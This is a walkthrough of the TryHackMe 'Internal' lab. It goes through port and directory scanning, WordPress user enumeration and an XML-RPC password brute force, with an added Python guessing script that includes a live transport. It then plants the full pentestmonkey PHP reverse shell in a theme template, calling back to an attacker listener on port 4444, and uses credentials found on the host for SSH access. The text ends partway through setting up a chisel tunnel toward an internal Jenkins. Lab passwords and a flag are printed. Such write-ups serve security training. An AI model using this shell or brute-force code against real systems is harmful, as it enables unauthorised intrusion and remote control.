INTERNAL (TryHackMe)


First, run nmap against the target (10.10.216.78) to identify open ports and what is listening on them, as shown below. The flags used: -p- covers all 65535 TCP ports, --min-rate 5000 speeds the scan up, -n and -Pn skip DNS resolution and host discovery, and -sC runs the default NSE scripts. Note that -sV is not used, so service versions are not fingerprinted here; the Apache version is recovered later from the Server header.
Key open ports and services:
  1. Port 80 (HTTP): Apache serving its default page (title "Apache2 Ubuntu Default Page: It works"). Supported methods are GET, HEAD, POST and OPTIONS; TRACE is not enabled, so nothing risky is flagged there.
  2. Port 22 (SSH): OpenSSH on Linux, presenting RSA, ECDSA and ED25519 host keys.

┌──(root㉿kali)-[/home/luis/Descargas]

└─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv

Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST

NSE: Loaded 126 scripts for scanning.

NSE: Script Pre-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 12:06

Completed NSE at 12:06, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 12:06

Completed NSE at 12:06, 0.00s elapsed

Initiating SYN Stealth Scan at 12:06

Scanning 10.10.216.78 [65535 ports]

Discovered open port 80/tcp on 10.10.216.78

Discovered open port 22/tcp on 10.10.216.78

Increasing send delay for 10.10.216.78 from 0 to 5 due to max_successful_tryno increase to 4

Increasing send delay for 10.10.216.78 from 5 to 10 due to max_successful_tryno increase to 5

Increasing send delay for 10.10.216.78 from 10 to 20 due to 1662 out of 5538 dropped probes since last increase.

Completed SYN Stealth Scan at 12:06, 16.73s elapsed (65535 total ports)

NSE: Script scanning 10.10.216.78.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 12:06

Completed NSE at 12:07, 19.24s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 12:07

Completed NSE at 12:07, 0.01s elapsed

Nmap scan report for 10.10.216.78

Host is up, received user-set (0.33s latency).

Scanned at 2025-08-07 12:06:29 CEST for 36s

Not shown: 65533 closed tcp ports (reset)

PORT  STATE SERVICE REASON

22/tcp open ssh    syn-ack ttl 61

| ssh-hostkey:

|  2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzpZTvmUlaHPpKH8X2SHMndoS+GsVlbhABHJt4TN/nKUSYeFEHbNzutQnj+DrUEwNMauqaWCY7vNeYguQUXLx4LM5ukMEC8IuJo0rcuKNmlyYrgBlFws3q2956v8urY7/McCFf5IsItQxurCDyfyU/erO7fO02n2iT5k7Bw2UWf8FPvM9/jahisbkA9/FQKou3mbaSANb5nSrPc7p9FbqKs1vGpFopdUTI2dl4OQ3TkQWNXpvaFl0j1ilRynu5zLr6FetD5WWZXAuCNHNmcRo/aPdoX9JXaPKGCcVywqMM/Qy+gSiiIKvmavX6rYlnRFWEp25EifIPuHQ0s8hSXqx5

|  256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMFOI/P6nqicmk78vSNs4l+vk2+BQ0mBxB1KlJJPCYueaUExTH4Cxkqkpo/zJfZ77MHHDL5nnzTW+TO6e4mDMEw=

|  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMlxubXGh//FE3OqdyitiEwfA2nNdCtdgLfDQxFHPyY0

80/tcp open http   syn-ack ttl 61

|_http-title: Apache2 Ubuntu Default Page: It works

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

NSE: Script Post-scanning.

NSE: Starting runlevel 1 (of 2) scan.

Initiating NSE at 12:07

Completed NSE at 12:07, 0.00s elapsed

NSE: Starting runlevel 2 (of 2) scan.

Initiating NSE at 12:07

Completed NSE at 12:07, 0.00s elapsed

Read data files from: /usr/share/nmap

Nmap done: 1 IP address (1 host up) scanned in 36.46 seconds

          Raw packets sent: 79035 (3.478MB) | Rcvd: 75979 (3.039MB)

Opening http://10.10.216.78/ in a browser only shows the Apache default page, so the next step is directory brute forcing with gobuster. The run was interrupted at 0.78% of the wordlist, so the list is not exhaustive, but it already found several interesting paths:
  1. /.php (Status: 403 Forbidden; Apache refuses the bare extension, this is not a real page)
  2. /blog (Status: 301, redirects to /blog/)
  3. /wordpress (Status: 301, redirects to /wordpress/)
  4. /javascript (Status: 301, redirects to /javascript/)

┌──(root㉿kali)-[/home/luis/Descargas]

└─# gobuster dir -u "http://10.10.216.78/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,tar,back

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                    http://10.10.216.78/

[+] Method:                 GET

[+] Threads:                10

[+] Wordlist:               /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

[+] Negative Status codes:  404

[+] User Agent:             gobuster/3.6

[+] Extensions:             php,txt,tar,back

[+] Timeout:                10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/.php                (Status: 403) [Size: 277]

/blog                (Status: 301) [Size: 311] [--> http://10.10.216.78/blog/]

/wordpress           (Status: 301) [Size: 316] [--> http://10.10.216.78/wordpress/]

/javascript          (Status: 301) [Size: 317] [--> http://10.10.216.78/javascript/]

Progress: 8640 / 1102800 (0.78%)^C

[!] Keyboard interrupt detected, terminating.

Progress: 8640 / 1102800 (0.78%)

===============================================================

Finished

===============================================================                        

Now add an entry to /etc/hosts mapping the target IP to the hostname internal.thm, as shown below. The WordPress site under /blog/ is addressed by that name for the rest of the walkthrough, so wpscan and the links in the site need it to resolve.

┌──(root㉿kali)-[/home/luis/Descargas]

└─# nano /etc/hosts

127.0.0.1      localhost

127.0.1.1      kali

10.10.216.78   internal.thm

# The following lines are desirable for IPv6 capable hosts

::1    localhost ip6-localhost ip6-loopback

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

The screenshot that followed here (not reproduced) showed the blog loading at http://internal.thm/blog/, confirming the entry works.

Next, run wpscan against the blog with -e u,p (enumerate users and plugins). It identifies WordPress 5.4.2, the Twenty Seventeen theme, XML-RPC enabled, and a single user, admin, as shown below.

┌──(root㉿kali)-[/home/luis/Descargas]

└─# wpscan --url http://internal.thm/blog/ -e u,p            

_______________________________________________________________

        __         _______  _____

        \ \       / / __ \ / ____|

         \ \ /\ / /| |__) | (___  ___ __ _ _ __ ®

          \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

           \ /\ / | |    ____) | (__| (_| | | | |

            \/ \/  |_|   |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team

                        Version 3.8.28

      Sponsored by Automattic - https://automattic.com/

      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.216.78]

[+] Started: Thu Aug 7 12:30:39 2025

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 | - http://codex.wordpress.org/XML-RPC_Pingback_API

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 | - https://www.iplocation.net/defend-wordpress-from-ddos

 | - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).

 | Found By: Rss Generator (Passive Detection)

 | - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

 | - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen

 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/

 | Last Updated: 2025-04-15T00:00:00.000Z

 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt

 | [!] The version is out of date, the latest version is 3.9

 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507

 | Style Name: Twenty Seventeen

 | Style URI: https://wordpress.org/themes/twentyseventeen/

 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...

 | Author: the WordPress team

 | Author URI: https://wordpress.org/

 |

 | Found By: Css Style In Homepage (Passive Detection)

 |

 | Version: 2.3 (80% confidence)

 | Found By: Style (Passive Detection)

 | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs - Time: 00:00:02 <=========================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] admin

 | Found By: Author Posts - Author Pattern (Passive Detection)

 | Confirmed By:

 | Rss Generator (Passive Detection)

 | Wp Json Api (Aggressive Detection)

 |  - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1

 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)

 | Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Aug 7 12:31:02 2025

[+] Requests Done: 54

[+] Cached Requests: 7

[+] Data Sent: 14.778 KB

[+] Data Received: 472.771 KB

[+] Memory used: 263.469 MB

[+] Elapsed time: 00:00:22

Then run a password attack against that user. Because XML-RPC is enabled, wpscan guesses through xmlrpc.php rather than the login form, and with rockyou.txt it finds the password my2boys after 3885 attempts, as shown below.

┌──(root㉿kali)-[/home/luis/Descargas]

└─# wpscan --url http://internal.thm/blog/ -U admin -P /usr/share/wordlists/rockyou.txt 

_______________________________________________________________

        __         _______  _____

        \ \       / / __ \ / ____|

         \ \ /\ / /| |__) | (___  ___ __ _ _ __ ®

          \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \

           \ /\ / | |    ____) | (__| (_| | | | |

            \/ \/  |_|   |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team

                        Version 3.8.28

      Sponsored by Automattic - https://automattic.com/

      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.216.78]

[+] Started: Thu Aug 7 12:40:23 2025

Interesting Finding(s):

[+] Headers

 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 | - http://codex.wordpress.org/XML-RPC_Pingback_API

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/

 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/

 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 | - https://www.iplocation.net/defend-wordpress-from-ddos

 | - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).

 | Found By: Rss Generator (Passive Detection)

 | - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

 | - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen

 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/

 | Last Updated: 2025-04-15T00:00:00.000Z

 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt

 | [!] The version is out of date, the latest version is 3.9

 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507

 | Style Name: Twenty Seventeen

 | Style URI: https://wordpress.org/themes/twentyseventeen/

 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...

 | Author: the WordPress team

 | Author URI: https://wordpress.org/

 |

 | Found By: Css Style In Homepage (Passive Detection)

 |

 | Version: 2.3 (80% confidence)

 | Found By: Style (Passive Detection)

 | - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

 Checking Config Backups - Time: 00:00:22 <========================================================================> (137 / 137) 100.00% Time: 00:00:22

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s

 Trying admin / calderon  Time: 00:11:20
 Trying admin / leigh     Time: 00:11:21
 Trying admin / dipset1   Time: 00:11:21
 Trying admin / chico     Time: 00:11:22
 Trying admin / my2boys   Time: 00:11:23  [SUCCESS] - admin / my2boys
 Trying admin / princess7 Time: 00:11:23  (3885 / 14348277) 0.02% ETA: ??:??:??

[!] Valid Combinations Found:

 | Username: admin, Password: my2boys

[!] No WPScan API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Aug 7 12:52:15 2025

[+] Requests Done: 4025

[+] Cached Requests: 38

[+] Data Sent: 2.037 MB

[+] Data Received: 2.306 MB

[+] Memory used: 298.664 MB

[+] Elapsed time: 00:11:52
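As an added example (not from the original post and not wpscan's code), here are the two WordPress checks wpscan performed above written out in plain Python: pulling login names out of the REST users endpoint that confirmed the admin user, and using the XML-RPC method wp.getUsersBlogs as the credential oracle for the password attack. The sample JSON and XML responses are constructed, demo_send is an offline stand-in for the target, and live_send is an assumed helper name; the faultCode 403 reply is WordPress' standard answer to bad credentials.

```python
import json
import xml.etree.ElementTree as ET
from typing import Callable, Iterable, Optional
from xml.sax.saxutils import escape

# Constructed sample responses for offline use; they are not captured from the
# target, only shaped like what WordPress 5.x returns.
WP_JSON_USERS_SAMPLE = (
    '[{"id":1,"name":"admin","slug":"admin",'
    '"link":"http://internal.thm/blog/index.php/author/admin/"}]'
)
XMLRPC_FAULT_SAMPLE = (
    "<?xml version='1.0'?><methodResponse><fault><value><struct>"
    "<member><name>faultCode</name><value><int>403</int></value></member>"
    "<member><name>faultString</name><value><string>Incorrect username or password."
    "</string></value></member></struct></value></fault></methodResponse>"
)
XMLRPC_OK_SAMPLE = (
    "<?xml version='1.0'?><methodResponse><params><param><value><array><data>"
    "<value><struct><member><name>blogName</name><value><string>Internal</string>"
    "</value></member></struct></value></data></array></value></param></params>"
    "</methodResponse>"
)


def users_from_wp_json(body: str) -> list:
    """Login names from /wp-json/wp/v2/users. 'slug' is derived from the
    login name; 'name' is only the display name and may differ."""
    return [u["slug"] for u in json.loads(body) if "slug" in u]


def build_login_call(username: str, password: str) -> bytes:
    """wp.getUsersBlogs is the cheapest authenticated XML-RPC method, so it
    serves as a credential oracle without creating or changing any content."""
    return (
        "<?xml version='1.0'?><methodCall><methodName>wp.getUsersBlogs</methodName>"
        "<params>"
        f"<param><value><string>{escape(username)}</string></value></param>"
        f"<param><value><string>{escape(password)}</string></value></param>"
        "</params></methodCall>"
    ).encode()


def login_succeeded(response_xml: str) -> bool:
    """True for a normal methodResponse, False for a <fault> (WordPress uses
    faultCode 403 for bad credentials). Anything else is not XML-RPC at all."""
    root = ET.fromstring(response_xml)
    if root.tag != "methodResponse":
        raise ValueError("not an XML-RPC methodResponse")
    return root.find("fault") is None


def guess_password(send: Callable[[bytes], str], username: str,
                   candidates: Iterable[str]) -> Optional[str]:
    """Try each candidate through `send` (a function that POSTs the body to
    xmlrpc.php and returns the response text); stop at the first success."""
    for pw in candidates:
        if login_succeeded(send(build_login_call(username, pw))):
            return pw
    return None


def demo_send(body: bytes) -> str:
    """Offline stand-in for the target: accepts only the password found above."""
    return XMLRPC_OK_SAMPLE if b"<string>my2boys</string>" in body else XMLRPC_FAULT_SAMPLE


def live_send(url: str) -> Callable[[bytes], str]:
    """Real transport for an engagement, e.g. live_send('http://internal.thm/blog/xmlrpc.php')."""
    import urllib.request

    def _send(body: bytes) -> str:
        req = urllib.request.Request(url, data=body, headers={"Content-Type": "text/xml"})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("utf-8", "replace")
    return _send


if __name__ == "__main__":
    print(users_from_wp_json(WP_JSON_USERS_SAMPLE))
    print(guess_password(demo_send, "admin", ["calderon", "leigh", "my2boys", "princess7"]))
```

Swap demo_send for live_send(url) to run it for real. The point of wp.getUsersBlogs as the oracle is that it needs valid credentials but changes nothing, which is also why a defender should disable or restrict xmlrpc.php when it is not needed: the login form can be rate limited by plugins, but XML-RPC calls usually are not.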

With the password my2boys recovered, log in to the WordPress dashboard at http://internal.thm/blog/wp-login.php as admin.

Once in, go to Appearance > Theme Editor (the screenshots that were here are not reproduced). Because the admin role can edit theme files, any PHP written into a template is executed by the web server when that template is rendered. The 404 Template (404.php) is the usual choice because it is trivial to trigger: request any page that does not exist. A hardened install would set DISALLOW_FILE_EDIT to true in wp-config.php, which removes the editor entirely.

Replace the contents of the 404 template with the pentestmonkey PHP reverse shell below, setting $ip to the attacking machine and $port to the listener port (here 10.2.2.76 and 4444). The original is at:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.2.2.76';  // CHANGE THIS: the attacking machine (the listener below reports the callback arriving at 10.2.2.76)
$port = 4444;       // CHANGE THIS: must match the nc listener port
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>


Now start a netcat listener on port 4444, the port configured in the shell, and then trigger the template by requesting a page under the blog that does not exist. The callback is shown below.

┌──(luis㉿kali)-[~]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

connect to [10.2.2.76] from (UNKNOWN) [10.10.216.78] 35126

Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 11:12:12 up 1:07, 0 users, load average: 0.00, 0.00, 0.00

USER    TTY     FROM            LOGIN@  IDLE  JCPU  PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

The shell is PHP (not JSP) and runs as soon as Apache renders the modified 404 template. Here that was done by requesting a URL that does not exist, http://internal.thm/blog/index.php/2020/08/03/hello-world1/ (a misspelling of the real hello-world post is enough). The target then connected back to the listener and handed over a shell running as www-data, the Apache user, which is exactly the privilege level the comment in the script warns about.

Next, run the following commands:
  1. python -c 'import pty; pty.spawn("/bin/bash")' (upgrades the dumb shell to a pseudo-terminal so interactive programs work; this is a shell upgrade, not persistence)
  2. ls (list the filesystem root)
  3. cd /home (aubreanna's home directory is there, but www-data cannot enter it)
  4. cd /opt (application data often lives here, and it is world-readable)
  5. cat wp-save.txt (IMPORTANT: this note holds the credentials aubreanna:bubb13guM!@#123)

$ python -c 'import pty; pty.spawn("/bin/bash")'

www-data@internal:/$ ls 

ls

bin   dev  initrd.img     lib64    mnt  root snap     sys var

boot  etc  initrd.img.old lost+found opt  run  srv      tmp vmlinuz

cdrom home lib        media    proc sbin swap.img usr vmlinuz.old

www-data@internal:/$ cd /home   

cd /home

www-data@internal:/home$ ls

ls

aubreanna

www-data@internal:/home$ cd aubreanna   

cd aubreanna

bash: cd: aubreanna: Permission denied

www-data@internal:/home$ ls

ls

aubreanna

www-data@internal:/home$ cd ..   

cd ..

www-data@internal:/$ ls

ls

bin   dev  initrd.img     lib64    mnt  root snap     sys var

boot  etc  initrd.img.old lost+found opt  run  srv      tmp vmlinuz

cdrom home lib        media    proc sbin swap.img usr vmlinuz.old

www-data@internal:/$ cd opt

cd opt

www-data@internal:/opt$ ls

ls

containerd wp-save.txt

www-data@internal:/opt$ cat wp-save.txt

cat wp-save.txt

Bill,


Aubreanna needed these credentials for something later. Let her know you have them and where they are.


aubreanna:bubb13guM!@#123

www-data@internal:/opt$

With aubreanna's password in hand, log in over SSH on port 22 as shown below. The same password works for her system account, so the fragile www-data shell is no longer needed.

┌──(luis㉿kali)-[~]

└─$ ssh aubreanna@10.10.216.78

The authenticity of host '10.10.216.78 (10.10.216.78)' can't be established.

ED25519 key fingerprint is SHA256:seRYczfyDrkweytt6CJT/aBCJZMIcvlYYrTgoGxeHs4.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '10.10.216.78' (ED25519) to the list of known hosts.

aubreanna@10.10.216.78's password:

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation: https://help.ubuntu.com

 * Management:    https://landscape.canonical.com

 * Support:       https://ubuntu.com/advantage

 System information as of Thu Aug 7 11:16:38 UTC 2025

 System load: 0.0              Processes:             110

 Usage of /:  63.7% of 8.79GB  Users logged in:       0

 Memory usage: 35%              IP address for eth0:   10.10.216.78

 Swap usage:  0%               IP address for docker0: 172.17.0.1

 => There is 1 zombie process.

 * Canonical Livepatch is available for installation.

  - Reduce system reboots and improve kernel security. Activate at:

    https://ubuntu.com/livepatch

0 packages can be updated.

0 updates are security updates.

Last login: Mon Aug 3 19:56:19 2020 from 10.6.2.56

aubreanna@internal:~$

aubreanna@internal:~$ ls -la

total 56

drwx------ 7 aubreanna aubreanna 4096 Aug 3 2020 .

drwxr-xr-x 3 root     root     4096 Aug 3 2020 ..

-rwx------ 1 aubreanna aubreanna   7 Aug 3 2020 .bash_history

-rwx------ 1 aubreanna aubreanna 220 Apr 4 2018 .bash_logout

-rwx------ 1 aubreanna aubreanna 3771 Apr 4 2018 .bashrc

drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 .cache

drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 .gnupg

drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 .local

-rwx------ 1 root     root      223 Aug 3 2020 .mysql_history

-rwx------ 1 aubreanna aubreanna 807 Apr 4 2018 .profile

drwx------ 2 aubreanna aubreanna 4096 Aug 3 2020 .ssh

-rwx------ 1 aubreanna aubreanna   0 Aug 3 2020 .sudo_as_admin_successful

-rwx------ 1 aubreanna aubreanna  55 Aug 3 2020 jenkins.txt

drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 snap

Gotcha! The user flag is in her home directory:

  1. /home/aubreanna/user.txt

-rwx------ 1 aubreanna aubreanna  21 Aug 3 2020 user.txt

aubreanna@internal:~$ cat user.txt

THM{int3rna1_fl4g_1}

aubreanna@internal:~$ ls

jenkins.txt  snap user.txt

aubreanna@internal:~$ cat jenkins.txt

Internal Jenkins service is running on 172.17.0.2:8080


That note points to the next hop: a Jenkins instance on the Docker bridge network (172.17.0.2:8080) that is not reachable from outside the host. We need some way to tunnel that port back to the attacking machine.

aubreanna@internal:~$

aubreanna@internal:~$ hostname -I

10.10.216.78 172.17.0.1

Listing the listening sockets with ss confirms the port: 8080 is bound to 127.0.0.1 only (most likely Docker publishing the container's port on loopback), alongside MySQL on 127.0.0.1:3306, while only SSH and HTTP are exposed on all interfaces.

aubreanna@internal:~$ ss -tulpn

Netid      State        Recv-Q       Send-Q                   Local Address:Port                Peer Address:Port       

udp        UNCONN       0            0                        127.0.0.53%lo:53                       0.0.0.0:*          

udp        UNCONN       0            0                    10.10.216.78%eth0:68                       0.0.0.0:*          

tcp        LISTEN       0            128                          127.0.0.1:8080                     0.0.0.0:*          

tcp        LISTEN       0            128                      127.0.0.53%lo:53                       0.0.0.0:*          

tcp        LISTEN       0            128                            0.0.0.0:22                       0.0.0.0:*          

tcp        LISTEN       0            128                          127.0.0.1:40263                    0.0.0.0:*          

tcp        LISTEN       0            80                           127.0.0.1:3306                     0.0.0.0:*          

tcp        LISTEN       0            128                                  *:80                             *:*          

tcp        LISTEN       0            128                               [::]:22                          [::]:*

To reach it we use chisel, a TCP tunnel carried over HTTP/WebSocket, with one copy on each end:

  1. Download the Linux amd64 release from https://github.com/jpillora/chisel (releases page)
  2. chmod +x chisel_1.10.1_linux_amd64
  3. ./chisel_1.10.1_linux_amd64 (prints the usage shown below)

Then copy the same binary to the target with scp.

┌──(luis㉿kali)-[~/Descargas]

└─$ chmod +x chisel_1.10.1_linux_amd64

┌──(luis㉿kali)-[~/Descargas]

